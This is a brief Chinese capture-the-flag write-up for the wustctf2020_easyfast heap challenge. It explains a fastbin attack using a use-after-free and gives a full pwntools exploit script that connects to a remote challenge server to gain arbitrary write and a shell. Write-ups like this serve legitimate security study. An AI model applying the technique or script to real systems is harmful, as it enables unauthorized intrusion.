BUU-wustctf2020_easyfast-WP
fastbin attack水题,大概是House Of Spirit
存在UAF,所以也不需要double free了,申请两个chunk,free掉他们,由于fastbin的LIFO策略,修改第二个chunk的fd指针为0x602080,然后malloc两次就可以对0x602090任意写。当然由于fastbin在分配时会检测被分配的chunk的size的正确性
if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
{
errstr = "malloc(): memory corruption (fast)";
errout:
malloc_printerr (check_action, errstr, chunk2mem (victim));
return NULL;
}
而0x602088处已有p64(0x50),所以我们分配的chunk大小需要为0x40
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level ="debug")
#sh = process("./wustctf2020_easyfast")
sh = remote("node3.buuoj.cn",26003)
sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")
sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")
sh.sendlineafter("choice>\n","2")
sh.sendlineafter("index>\n","0")
sh.sendlineafter("choice>\n","2")
sh.sendlineafter("index>\n","1")
sh.sendlineafter("choice>\n","3")
sh.sendlineafter("index>\n","1")
sh.send(p64(0x602080))
sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")
sh.sendlineafter("choice>\n","1")
sh.sendlineafter("size>\n","64")
sh.sendlineafter("choice>\n","3")
sh.sendlineafter("index>\n","3")
sh.send(p64(0))
sh.sendlineafter("choice>\n","4")
sh.interactive()